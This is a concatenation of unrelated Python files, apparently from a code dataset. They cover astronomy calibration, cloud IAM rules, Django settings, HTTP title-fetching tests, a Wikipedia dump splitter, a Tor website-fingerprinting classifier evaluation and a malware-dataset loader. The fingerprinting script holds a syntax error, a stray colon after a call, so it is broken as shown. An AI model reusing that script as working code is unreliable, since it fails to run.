"url": "http://sample_english.com",
"digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER",
"cc_segment": "crawl-data/sample.warc.wet",
"line_ids": encode_line_ids([3]),
"bucket": "top_notch",
},
]
with jsonql.open_write(tmp_path / "sample.json") as o:
for mini in mini_docs:
print(json.dumps(mini), file=o)
fetcher = minify.MetadataFetcher(tmp_path)
cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])
docs = [d for d in fetcher.map(cc) if d is not None]
assert cc.retrieved_segments == 1
# Note: documents are retrieved as they are ordered in the .warc.wet file
assert [
"Facts are stubborn things, but statistics are more pliable.",
"事實是固執的東西,但統計數字卻比較柔和。",
] == [d["raw_content"] for d in docs]
assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
| StarcoderdataPython |
1694378 | '''
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SALT RSS Calibration
This program performs the flux calibration and heliocentric velocity correction
for a FITS file reduced by the SALT RSS pipeline.
The target FITS file is typically a 2D flux spectrum of a galaxy, but may but may be other astronomical objects.
*NOTE*: This requires a pre-existing sensitivity or sens FITS file.
The SALT RSS Data Reduction procedure is described in:
http://mips.as.arizona.edu/~khainline/salt_redux.html
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
'''
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Import Python Libraries
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
import os # For bash commands
from pyraf import iraf # For IRAF commands in Python
import astropy.io.fits as fits # For FITS file handling
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Load IRAF Libraries
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
iraf.noao()
iraf.noao.twod()
iraf.noao.twod.longslit()
iraf.imutil()
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Flux Calibration
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
def flux(file, err_file, basename):
'''
Applies the flux calibration for the astronomical object's FITS file using a pre-existing sensitivity or sens file.
:param file [String]: Filename (without extension) of the FITS file.
:param err_file [String]: Filename (without extension) of the error (1 sigma) FITS file.
:param basename [String]: Basename of the FITS file.
:return: fc_file [String]: Filename (without extension) of the *flux corrected* FITS file.
:return fc_err_file [String]: Filename (without extension) of the *flux corrected* error (1 sigma) FITS file.
'''
print('\n------------------------\nFlux Calibration\n-------------------------\n')
# Load sensitivity FITS file.
sens = raw_input('Please enter the complete filepath (with extension) of the sensitivity file: ')
# Set names of *flux corrected* FITS files.
fc_file = 'fc_{}.fits'.format(basename)
fc_err_file = 'fc_err_{}.fits'.format(basename)
# Apply FLUX calibration
iraf.noao.twod.longslit.calibrate(file, output=fc_file, sensitivity=sens, fnu='No')
iraf.noao.twod.longslit.calibrate(err_file, output=fc_err_file, sensitivity=sens, fnu='No')
# Extract header information
hdu = fits.open(file)
hdr = hdu[0].header
RA = hdr['RA']
DEC = hdr['DEC']
UT = hdr['UTC-OBS']
DATE = hdr['DATE-OBS']
EPOCH = hdr['EPOCH']
OBS = hdr['OBSERVAT']
# Update header information of newly created files
iraf.imutil.hedit(images=fc_file, fields='RA', value=RA)
iraf.imutil.hedit(images=fc_file, fields='DEC', value=DEC)
iraf.imutil.hedit(images=fc_file, fields='UT', value=UT)
iraf.imutil.hedit(images=fc_file, fields='DATE-OBS', value=DATE)
iraf.imutil.hedit(images=fc_file, fields='EPOCH', value=EPOCH)
iraf.imutil.hedit(images=fc_file, fields='OBSERVAT', value=OBS)
iraf.imutil.hedit(images=fc_err_file, fields='RA', value=RA)
iraf.imutil.hedit(images=fc_err_file, fields='DEC', value=DEC)
iraf.imutil.hedit(images=fc_err_file, fields='UT', value=UT)
iraf.imutil.hedit(images=fc_err_file, fields='DATE-OBS', value=DATE)
iraf.imutil.hedit(images=fc_err_file, fields='EPOCH', value=EPOCH)
iraf.imutil.hedit(images=fc_err_file, fields='OBSERVAT', value=OBS)
return fc_file, fc_err_file
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Heliocentric Velocity Correction
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
def velcor(fc_file, fc_err_file, basename):
'''
Generates the bash code that can be used to apply the Heliocentric velocity correction to the *flux calibrated* FITS file.
*Note*: The code is generated since the velocity correction command needs manual input through the command terminal.
This just speeds up the process by generating some code you can initially copy and paste.
:param: fc_file [String]: Filename (without extension) of the *flux corrected* FITS file.
:param fc_err_file [String]: Filename (without extension) of the *flux corrected* error (1 sigma) FITS file.
:param basename [String]: Basename of the FITS file.
:return: None
'''
# Set names of *heliocentric velocity corrected* FITS files.
hc_file = 'hc_{}.fits'.format(basename)
hc_err_file = 'hc_err_{}.fits'.format(basename)
print(
'\n---------------------------------------\nHeliocentric Velocity Correction\n---------------------------------------\n')
print(
'\n\n>> Please complete the Heliocentric Velocity Correction & aperture attraction manually through PyRAF in bash:\n\n')
# Print out the code to be used in PyRAF through bash.
print('rvcorrect images={}'.format(fc_file))
print('dopcor {} {} isvel+'.format(fc_file, hc_file))
print('rvcorrect images={}'.format(fc_err_file))
print('dopcor {} {} isvel+'.format(fc_err_file, hc_err_file))
print(
'\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\nData Reduction Completed for {}!\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n'.format(
basename))
print(
'\n\n>> Remember to apply Galactic Extinction Correction!:\n\n')
return None
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Apply Corrections
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
def correct(basename):
'''
Automatically applies the flux calibration and generates the code to be used in PyRAF (through bash) to apply the heliocentric velocity correction.
:param basename [String]: Basename of the FITS file.
:return: None
'''
# Set file names.
file = '{}.fits'.format(basename)
err_file = 'err_{}.fits'.format(basename)
# Apply flux calibration.
fc_file, fc_err_file = flux(file, err_file, basename)
# Generate code for heliocentric velocity correction.
velcor(fc_file, fc_err_file, basename)
return None
'''
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Run Program
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
'''
# Set file path of data.
path = raw_input('Please enter the path of the working directory: ')
# Change to path.
os.chdir(path)
# Specify which file you're working with. This program assumes the main file and 1 sigma error file have the same basename.
# I.e:
# basename.fits and err_basename.fits
# where basename is the name of the astronomical object.
basename = raw_input('Please enter filename (without extension) of the galaxy\'s FITS file: ')
# Run the main program.
correct(basename)
| StarcoderdataPython |
172348 | <filename>cloudrail/knowledge/rules/aws/non_context_aware/iam_no_human_users_rule.py
from typing import Dict, List
from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext
from cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule
from cloudrail.knowledge.rules.base_rule import Issue
from cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType
class IamNoHumanUsersRule(AwsBaseRule):
def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]:
issues_list: List[Issue] = []
for user in env_context.users:
if any(user.name == login_profile.name and user.account == login_profile.account for login_profile in env_context.users_login_profile):
issues_list.append(Issue(f'The {user.get_type()} `{user.get_friendly_name()}` has console access, '
f'and so is considered human', user, user))
return issues_list
def get_id(self) -> str:
return "non_car_iam_no_human_users"
def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool:
return bool(environment_context.users and environment_context.users_login_profile)
| StarcoderdataPython |
3260434 | <reponame>rgreinho/pyconsql<gh_stars>0
"""Define the connexion settings for a local setup."""
import os
# pylint: disable=wildcard-import,unused-wildcard-import
from pyconsql.api.settings.common import * # noqa
DEBUG = True
if os.environ.get("KUBERNETES_PORT"):
minikube_ip = os.environ.get("MINIKUBE_IP", "192.168.99.100")
BASE_URL = f"http://api.{minikube_ip}.nip.io"
else:
BASE_URL = f"http://0.0.0.0:{PORT}" # noqa: F405
DATABASE = {
"URI": "sqlite:///petstore.db",
}
| StarcoderdataPython |
1627165 | #!/usr/bin/env python
"""
Copy the configuration file from the repository to the current directory, for editing.
"""
import argparse
import os
import sys
import yaml
import textwrap
from XtDac.ChandraUtils import logging_system
from XtDac.data_files import get_data_file_path
from XtDac.ChandraUtils.sanitize_filename import sanitize_filename
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Create a configuration file')
parser.add_argument("-o", "--output", help="Name for the new configuration file", type=str, required=True)
# Now get the parameters from the config file and add them as command line options
conf_file_template = get_data_file_path('sample_configuration.yml')
with open(conf_file_template, "r") as f:
tokens = []
current_comment = ''
current_name = ''
current_value = ''
for line in f.xreadlines():
if line[0]=='\n':
# Empty line, skip
continue
elif line[0]=='#':
# This is a comment
current_comment += line.replace("#"," ").replace("%", " percent")
else:
# Value
current_name = line.split(":")[0].lstrip().rstrip().replace(" ","_")
current_value = line.split(":")[1].lstrip().replace("\n","")
tokens.append((current_comment.lstrip().rstrip().replace("\n"," ").replace(" "," "),
current_name, current_value))
current_comment = ''
current_name = ''
current_value = ''
for (comment, name, value) in tokens:
if name.find("repository") > 0:
parser.add_argument("--%s" % name, help=comment, required=True)
else:
parser.add_argument("--%s" % name, help=comment, default=value)
# Get the logger
logger = logging_system.get_logger(os.path.basename(sys.argv[0]))
args = parser.parse_args()
# Now make sure that all 3 repositories are different from each other
# NOTE: this is a set, hence its entries are kept unique
directories = {sanitize_filename(args.data_repository),
sanitize_filename(args.region_repository),
sanitize_filename(args.output_repository)}
assert len(directories) == 3, "The data, region and output repositories must point at different directories"
# Load configuration file from the code repository
with open(conf_file_template) as f:
template = yaml.safe_load(f)
with open(args.output, "w+") as f:
for (comment, name, value) in tokens:
# Write comment
comment_lines = textwrap.wrap(comment, 80)
for line in comment_lines:
f.write("# %s\n" % line)
name_with_spaces = name.replace("_", " ")
assert name_with_spaces in template
# Write key : value pair
if name_with_spaces.find("repository") > 0 or name_with_spaces == 'work directory':
# Take absolute path
abs_path = sanitize_filename(args.__getattribute__(name))
# Create if needed
if not os.path.exists(abs_path):
logger.info("Directory %s does not exist, creating it" % abs_path)
try:
os.makedirs(abs_path)
except OSError:
logger.error("Could not create directory %s" % abs_path)
f.write("%s : %s\n\n" % (name_with_spaces, abs_path))
else:
f.write("%s : %s\n\n" % (name_with_spaces, args.__getattribute__(name))) | StarcoderdataPython |
141887 | # JANKENPOOP
import nextcord
import config
from nextcord.ext import commands
client = commands.Bot(command_prefix = 'janken ')
game = nextcord.Game("Legacy Code Course")
@client.event
async def on_ready():
await client.change_presence(status=nextcord.Status.idle, activity=game)
print("JANKENPOPP IS HERE HAHAHAHAHAHAH")
@client.command()
async def ping(ctx):
await ctx.send(f'hey im the best in the world annd is the best programmer and think you can see my latency well i am the fastest in the world but here you go but remember i am the best, pong!: `{round(client.latency * 1000)}ms rtt`')
@client.command()
async def windows96(ctx):
await ctx.send("WHAT WHAT IS THIS TRASH YOU MAY BE BETTER AT: https://windows93.net")
client.run(config.TOKEN) | StarcoderdataPython |
155963 | <filename>tbonlineproject/RegistrationRecaptcha/forms.py<gh_stars>0
from registration.forms import RegistrationForm
from CommentRecaptcha.fields import ReCaptchaField
class RegistrationFormRecaptcha(RegistrationForm):
recaptcha = ReCaptchaField()
| StarcoderdataPython |
1651645 | #! /usr/bin/env python3
# coding=utf-8
"""
Contains all logging related tools and logging settings.
"""
import argparse
import functools
import logging
import os
import pprint
import sys
# Convert verbose arguments to their corresponding level
_string_to_level = {
"DEBUG": logging.DEBUG,
"INFO": logging.INFO,
"WARNING": logging.WARNING,
"ERROR": logging.ERROR,
}
def logged(function):
"""
Decorator that calls logging.debug on the arguments and return value for the
function it decorates.
Usage:
@logging_tools.logged
def func():
// code
:param function: a python function
:type function: python function
"""
@functools.wraps(function)
def logged_function(*args, **kwargs):
"""
Prints out debug information before and after function is called
"""
logging.debug(f"Begin function: {function.__name__}")
logging.debug(f"Arguments:\n{pprint.pformat(args)}")
logging.debug(f"Keyword arguments:\n{pprint.pformat(kwargs)}")
return_value = function(*args, **kwargs)
logging.debug(f"End function: {function.__name__}")
logging.debug(
f"Return type({type(return_value)}):\n{pprint.pformat(return_value)}"
)
return return_value
return logged_function
class Logger:
"""
Instantiating this class enables logging.
Automatically adds a verbose option to your command line options.
If using argparse.ArgumentParser() to parse arguments, then the user should pass in the parser as an argument to
this class when instantiating it to add the options to your current command line options.
"""
def __init__(
self,
subcommand,
filename=None,
format="[%(levelname)s]: %(message)s",
level=logging.WARNING,
parser=argparse.ArgumentParser(),
):
"""
:param filename: If a filename is passed in and the logging command line option is passed in, then the logger
will use that filename for the log file.
:type filename: string
:param format: The format for the log output. Please see the python logging documentation for more info.
:type format: string
:param level: The logging level corresponds to the logging levels: DEBUG, INFO, WARNING, ERROR.
The command line argument will override this.
:type level: int
:param parser: If using argparse, pass the argument parser to this class to add in the verbose flags.
:type parser: argparse.ArgumentParser
"""
self.subcommand = subcommand
self.filename = filename
self.file_handle = None
self.format = format
self.level = level
parser.add_argument(
"-v",
default=0,
help="Print out additional details while the program is running.",
action="count",
)
parser.add_argument(
"--verbose",
default=self.level,
help="DEBUG, INFO, WARNING, ERROR. Default is WARNING.",
metavar="LEVEL",
)
parser.add_argument(
"--log",
default=False,
help="Write to log file at max verbosity level.",
action="store_true",
)
options, _ = parser.parse_known_args()
# not the default
if options.verbose != self.level:
try:
options.verbose = _string_to_level[options.verbose.upper()]
except (AttributeError, KeyError):
logging.warning("Invalid logging level. Using WARNING")
logging.warning("DEBUG, INFO, WARNING or ERROR are available.")
options.verbose = logging.WARNING
elif options.v:
if options.v > 1:
options.v = logging.DEBUG
elif options.v > 0:
options.v = logging.INFO
options.verbose = options.v
self.level = options.verbose
if options.verbose == logging.DEBUG or options.log or options.verbose >= logging.WARNING:
self.format = (
"[%(levelname)s][%(filename)s:%(lineno)s][%(funcName)s]: %(message)s"
)
elif options.verbose == logging.INFO:
self.format = f"[%(levelname)s][{self.subcommand}]: %(message)s"
# logging and stdout/stderr have different handles with the python logging package
handlers = []
if options.log:
self.level = logging.DEBUG
if not filename:
import time
timestamp = time.strftime("%Y%m%d_%H%M%S")
self.filename = os.getcwd() + "/" + timestamp + ".log"
print("Log filename: ", self.filename)
# Redirect python package logging output to log file
# Does not catch prints or stdout/stderr
logging_file_handler = logging.FileHandler(filename=self.filename)
handlers.append(logging_file_handler)
# Redirect stdout/stderr to logfile
self.file_handle = open(self.filename, "r+")
sys.stdout = self.file_handle
sys.stderr = self.file_handle
stdout_handler = logging.StreamHandler(sys.stdout)
handlers.append(stdout_handler)
logging.basicConfig(format=self.format,
level=self.level,
handlers=handlers)
def __del__(self):
if self.file_handle:
self.file_handle.close()
| StarcoderdataPython |
3335372 | <reponame>smevirtual/aperte
# Copyright 2018 SME Virtual Network Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Django settings for project development environments. These settings are
intended to be used with deploying this project into a Docker container.
"""
# pylint: disable=C0111,W0232
# Standard Library
import environ
import socket
# Third Party
from configurations import values
from .common import Common
class Development(Common):
# See https://docs.djangoproject.com/en/2.0/ref/settings/ for a description
# of each Django setting.
env = environ.Env()
# CORE SETTINGS
# --------------------------------------------------------------------------
DEBUG = values.BooleanValue(True)
INTERNAL_IPS = [
'127.0.0.1',
'10.0.2.2',
]
# INSTALLED APPS SETTINGS
# --------------------------------------------------------------------------
Common.INSTALLED_APPS += [
'django_extensions',
'devrecargar',
'debug_toolbar',
]
# MIDDLEWARE SETTINGS
# --------------------------------------------------------------------------
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
] + Common.MIDDLEWARE
# EMAIL SETTINGS
# --------------------------------------------------------------------------
MAIL_HOST = 'localhost'
EMAIL_PORT = 1025
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# django-cors-headers SETTINGS
# --------------------------------------------------------------------------
# TODO: Re-enable this.
# CORS_ORIGIN_WHITELIST = []
# django-debug-toolbar SETTINGS
# --------------------------------------------------------------------------
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
if env.bool('DJANGO_USE_DOCKER', default=True):
# This is required for the 'django-debug-toolbar' to work with Docker.
hostname, _, ips = socket.gethostbyname_ex(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + '1' for ip in ips]
# devrecargar SETTINGS
# --------------------------------------------------------------------------
DEVRECARGAR_PATHS_TO_WATCH = [{
'path': str(Common.APPS_ROOT_DIR),
'patterns': ['*.html', '*.js', '*.css'],
}]
| StarcoderdataPython |
3327040 | <filename>plugins/titlegiver/test/test_titlegiver.py
# coding=utf-8
import threading
import urllib
import os
import json
import urllib.parse
import unittest
import http.server
from plugins.titlegiver.titlegiver import Titlegiver
__author__ = "tigge"
__author__ = "reggna"
class Handler(http.server.BaseHTTPRequestHandler):
def redirect(self):
count = int(self.url_queries["count"][0])
url = self.url_queries["url"][0]
if count > 1:
url = "redirect?count={0}&url={1}".format(
count - 1, self.url_queries["url"][0]
)
self.send_response(301)
self.send_header("Location", url)
self.end_headers()
self.wfile.write(
"<html><head><title>Redirect</title></head><body>See {0}</body></html>".format(
url
).encode(
"utf-8"
)
)
def page(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(
"<html><head><title>Simple</title></head><body>Simple</body></html>".encode(
"utf-8"
)
)
def pages(self):
self.send_response(200)
dir = os.path.join("..", os.path.dirname(__file__))
# Read headers from JSON dict, .headers extension
try:
with open(dir + "/" + urllib.parse.unquote(self.path) + ".header") as fp:
for header, value in json.load(fp).items():
self.send_header(header, value)
# Default headers, if not found
except IOError:
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
ip = "localhost:{}".format(self.server.server_port).encode("ascii")
with open(dir + "/" + urllib.parse.unquote(self.path), "br") as fp:
self.wfile.write(fp.read().replace("$ADDRESS".encode("ascii"), ip))
def do_GET(self):
self.url_parts = urllib.parse.urlparse(self.path)
self.url_queries = urllib.parse.parse_qs(self.url_parts.query)
if self.url_parts.path == "/redirect":
self.redirect()
elif self.url_parts.path == "/page":
self.page()
elif self.url_parts.path.startswith("/pages"):
self.pages()
def log_message(self, format, *args):
return
class TitlegiverTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.http_server = http.server.HTTPServer(("", 0), Handler)
cls.http_server_thread = threading.Thread(target=cls.http_server.serve_forever)
cls.http_server_thread.start()
cls.URL = "http://localhost:{}".format(cls.http_server.server_port)
@classmethod
def tearDownClass(cls):
cls.http_server.shutdown()
cls.http_server.server_close()
cls.http_server_thread.join()
def test_redirect(self):
url = self.URL + "/page"
result = Titlegiver.get_title_from_url(
self.URL + "/redirect?count=10&url={0}".format(url)
)
self.assertEqual(result, u"Simple")
def test_meta_redirect(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/meta_redirect")
self.assertEqual(result, u"Simple")
def test_meta_redirect_in_noscript(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/meta_redirect_in_noscript"
)
self.assertEqual(result, u"Title without refreshing")
def test_specialchars(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/specialchar")
self.assertEqual(
result,
u"Title with special characters §½!\"@#£¤$%&/{([)]=}+?\`´'^~*'<>|,;.:-_",
)
def test_linebreaks(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks")
self.assertEqual(result, u"Title with line breaks and carriage returns")
def test_attributes(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/attributes")
self.assertEqual(result, u'Title with attribute id="pageTitle"')
def test_entities(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/entities")
self.assertEqual(
result,
u"Title with entities. "
u'XML: "& '
u"HTML: <Å©†♥ "
u"Int/hex: Hello "
u"Invalid: #k;�&fail;",
)
def test_nonascii(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/nönàscii")
self.assertEqual(result, u"Page with nön-àscii path")
def test_encoding_bom(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_bom")
self.assertEqual(result, u"Gådzölla - ゴジラ")
def test_encoding_xmldecl(self):
result = Titlegiver.get_title_from_url(self.URL + "/pages/encoding_xmldecl")
self.assertEqual(result, u"Samoraj - 武家")
def test_encoding_meta_charset(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/encoding_meta_charset"
)
self.assertEqual(result, u"Россия-Матушка")
def test_encoding_meta_httpequiv(self):
result = Titlegiver.get_title_from_url(
self.URL + "/pages/encoding_meta_httpequiv"
)
self.assertEqual(result, u"올드보이")
def test_split_strip_and_slice(self):
title = Titlegiver.get_title_from_url(self.URL + "/pages/linebreaks_with_cr")
result = Titlegiver.split_strip_and_slice(title, 2)
self.assertEqual(result, [u"Line1", "Line2"])
| StarcoderdataPython |
1720136 | <reponame>eddyydde/wikitablestosql
import os
import csv
import bz2
def prepare_parts_using_index(data_directory, file, index, done=0):
"""
Prepare parts by cutting multistream file according to index.
Prepare decompression directory.
:param data_directory: path as string
:param file: filename as string
:param index: index filename as string
:param done: for naming purposes, as int
:return: process information as dict
"""
# decompress index
decompressed_index_filename = os.path.splitext(index)[0]
with bz2.open(os.path.join(data_directory, index), mode='rb') as indexf:
decompressed_index = indexf.read()
with open(decompressed_index_filename, mode='wb') as decomp_index_file:
decomp_index_file.write(decompressed_index)
# parse index
byte_offsets = []
with open(decompressed_index_filename, encoding='UTF-8') as csv_file:
csv_index = csv.reader(csv_file, delimiter=':')
for row in csv_index:
if len(byte_offsets) == 0:
byte_offsets.append(int(row[0]))
else:
if int(row[0]) != byte_offsets[-1]:
byte_offsets.append(int(row[0]))
parts_directory = str(done) + 'parts' + '_' + file
# cut file according to index
if parts_directory not in os.listdir():
os.mkdir(parts_directory)
with open(os.path.join(data_directory, file), mode='rb') as f:
for i in range(len(byte_offsets)-1):
with open(os.path.join(parts_directory, 'part' + '_' + str(i+1) + '_' + file), mode='wb') as pf:
f.seek(byte_offsets[i])
data_part = f.read(byte_offsets[i+1] - byte_offsets[i])
pf.write(data_part)
f.seek(byte_offsets[-1])
last_part_name = 'part' + '_' + str(len(byte_offsets)) + '_' + file
with open(os.path.join(parts_directory, last_part_name), mode='wb') as lpf:
lpf.write(f.read())
# prepare for decompression
decompression_directory = 'decompressed' + '_' + parts_directory
if decompression_directory not in os.listdir():
os.mkdir(decompression_directory)
return {'decompressed_index_filename': decompressed_index_filename, 'parts_directory': parts_directory,
'last_part_name': last_part_name, 'parts_decompression_directory': decompression_directory}
def decompress_part(parts_directory, part_file, parts_decompression_directory):
"""
Decompress one part file.
:param parts_directory: path as string
:param part_file: filename as string
:param parts_decompression_directory: path as string
:return: filename as string
"""
decompressed_filename = 'decompressed' + '_' + os.path.splitext(part_file)[0]
with bz2.open(os.path.join(parts_directory, part_file), mode='rb') as f:
with open(os.path.join(parts_decompression_directory, decompressed_filename), mode='wb') as g:
g.write(f.read())
return decompressed_filename
| StarcoderdataPython |
15746 | from cdm.objectmodel import CdmCorpusDefinition, CdmManifestDefinition
from cdm.storage import LocalAdapter
from cdm.enums import CdmObjectType
def generate_manifest(local_root_path: str) -> 'CdmManifestDefinition':
"""
Creates a manifest used for the tests.
"""
cdmCorpus = CdmCorpusDefinition()
cdmCorpus.storage.default_namespace = 'local'
adapter = LocalAdapter(root=local_root_path)
cdmCorpus.storage.mount('local', adapter)
# add cdm namespace
cdmCorpus.storage.mount('cdm', adapter)
manifest = CdmManifestDefinition(cdmCorpus.ctx, 'manifest')
manifest.folder_path = '/'
manifest.namespace = 'local'
return manifest
def create_document_for_entity(cdm_corpus: 'CdmCorpusDefinition', entity: 'CdmEntityDefinition', nameSpace: str = 'local'):
"""
For an entity, it creates a document that will contain the entity.
"""
cdm_folder_def = cdm_corpus.storage.fetch_root_folder(nameSpace)
entity_doc = cdm_corpus.ctx.corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity.entity_name), False)
cdm_folder_def.documents.append(entity_doc)
entity_doc.definitions.append(entity)
return entity_doc
| StarcoderdataPython |
3228000 | import math
from construct import *
# "Why not use PIL" - PIL can read, but, as far as I could tell, won't natively create
# real, true, 16 color bmp. You can make a 16 color image just fine, but when you save it,
# it'll be formatted as a 256 color image. Maybe I'm wrong!
bitmap_struct = Struct(
"signature" / Const(b"BM"),
"file_size" / Rebuild(Int32ul, lambda ctx: 14 + 40 + int((ctx.height * ctx.width * ctx.bpp) / 8)),
Padding(4),
"data_offset" / Rebuild(Int32ul, 14 + 40 + ((2 ** this.bpp if this.bpp <= 8 else 0) * 4)),
"header_size" / Const(40, Int32ul),
"width" / Int32sl,
"height" / Int32sl,
"planes" / Int16ul,
"bpp" / Const(4, Int16ul), # bits per pixel
"compression" / Const(0, Int32ul),
"image_data_size" / Rebuild(Int32ul, lambda ctx: int((ctx.height * ctx.width * ctx.bpp) / 8)),
"horizontal_dpi" / Rebuild(Int32ul, lambda ctx: int(math.ceil(39.3701 * 72 * ctx.width))),
"vertical_dpi" / Rebuild(Int32ul, lambda ctx: int(math.ceil(39.3701 * 72 * ctx.height))),
"colors_used" / Int32ul,
"important_colors" / Int32ul,
"palette" / Array(
lambda ctx: 2 ** ctx.bpp if ctx.bpp <= 8 else 0,
Struct(
"B" / Int8ul,
"G" / Int8ul,
"R" / Int8ul,
Padding(1)
)
),
"pixels" / Array(this.height, Aligned(4, Bitwise(Aligned(8, Array(this.width, Nibble))))),
) | StarcoderdataPython |
3297613 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This is for experiment: random number of splits
@author: aaron
"""
from main import *
import glob
import multiprocessing as mp
import os
from extract import *
import joblib
logger = logging.getLogger('cumul')
def parse_arguments():
parser = argparse.ArgumentParser(description='Evaluate.')
parser.add_argument('-m',
metavar='<model path>',
help='Path to the directory of the model')
parser.add_argument('-p',
metavar='<raw trace path>')
parser.add_argument('-o',
metavar='<feature path>',
help='Path to the directory of the extracted features')
parser.add_argument('-mode',
metavar='<head or other>',
help='To test head or other')
parser.add_argument('--log',
type=str,
dest="log",
metavar='<log path>',
default='stdout',
help='path to the log file. It will print to stdout by default.')
# Parse arguments
args = parser.parse_args()
config_logger(args)
return args
def extractfeature(f):
global MON_SITE_NUM
fname = f.split('/')[-1].split(".")[0]
# logger.info('Processing %s...'%f)
try:
t = parse(f)
features = extract(t)
if '-' in fname:
label = int(fname.split('-')[0])
else:
label = int(MON_SITE_NUM)
return (features, label)
except Exception as e:
print(e)
return None
def pred_sing_trace(fdirs, scaler, model, prtype):
X_test = []
[X_test.append(extractfeature(f)[0]) for f in fdirs]
X_test = scaler.transform(X_test)
y_pred = model.predict(X_test)
outputdir = os.path.join(ct.randomdir, fdirs[0].split('/')[-3], fdirs[0].split('/')[-2]+"_"+prtype)
if not os.path.exists(outputdir):
os.makedirs(outputdir)
resultfile = os.path.join(outputdir,'predresult.txt')
with open(resultfile,'w') as f:
for i,filename in enumerate(fdirs):
f.write(filename.split("/")[-1].split('.')[0]+'\t'+str(y_pred[i])+'\n')
if __name__ == '__main__':
global MON_SITE_NUM
args = parse_arguments()
logger.info("Arguments: %s" % (args))
cf = read_conf(ct.confdir)
MON_SITE_NUM = int(cf['monitored_site_num'])
model = joblib.load(args.m)
logger.info('loading original data...')
dic = np.load(args.o, allow_pickle = True).item()
X = np.array(dic['feature'])
y = np.array(dic['label'])
# normalize the data
scaler = preprocessing.MinMaxScaler((-1,1))
scaler.fit(X)
testfolder = args.p
fdirs = glob.glob(os.path.join(args.p,'*'))
# for f in fdirs[:]:
# pred_sing_trace((f,scaler,model))
pred_sing_trace(fdirs, scaler, model, args.m.split('.')[1][-2:]):
# dic = np.load(args.p).item()
# X = np.array(dic['feature'])
# y = np.array(dic['label'])
# X = scaler.transform(X)
# logger.info('data are transformed into [-1,1]')
# y_pred = model.predict(X)
# score_func(y, y_pred) | StarcoderdataPython |
1663015 | import math
import numpy as np
from tidyframe import Possibly
@Possibly()
def log_possibly(x):
return math.log(x)
def test_Possibly_basic_success():
assert np.isclose(log_possibly(10), math.log(10)), 'Must result is True'
def test_pPossibly_basic_fail():
assert np.isnan(log_possibly(-10)), 'Must result is True'
def test_Possibly_change_otherwise():
@Possibly(otherwise=-1)
def log_possibly(x):
return math.log(x)
assert np.isclose(log_possibly(-10), -1), 'Must result is True'
def test_Possibly_classmethod_basic_success():
assert np.isclose(Possibly.possibly(math.log)(10),
math.log(10)), 'Must result is True'
def test_Possibly_classmethod_basic_fail():
assert np.isnan(Possibly.possibly(math.log)(-1)), 'Must result is True'
def test_Possibly_classmethod_change_default():
Possibly.otherwise_all = 1
Possibly.quiet_all = False
assert np.isclose(Possibly.possibly(math.log)(-1),
1), 'Must result is True'
def test_Possibly_print_exception():
@Possibly(otherwise=-1, quiet=False)
def log_possibly(x):
return math.log(x)
log_possibly(-10)
| StarcoderdataPython |
157745 | import os
import sys
import numpy as np
def get_malware_dataset(valid=False):
def get_monthly_data(file_path, num_feature=483):
'''Each row of `x_mat` is a datapoint.
It adds a constant one for another dimension at the end for the bias term.
Returns:
two numpy arrays, one for input of size (num_data, num_feature) and another for the output
(num_data,).
'''
x_mat = []
y_vec = []
with open(file_path, 'r') as datafile:
for line in datafile:
feature = [0] * num_feature
feature[-1] = 1 # bias term
items = line.split()
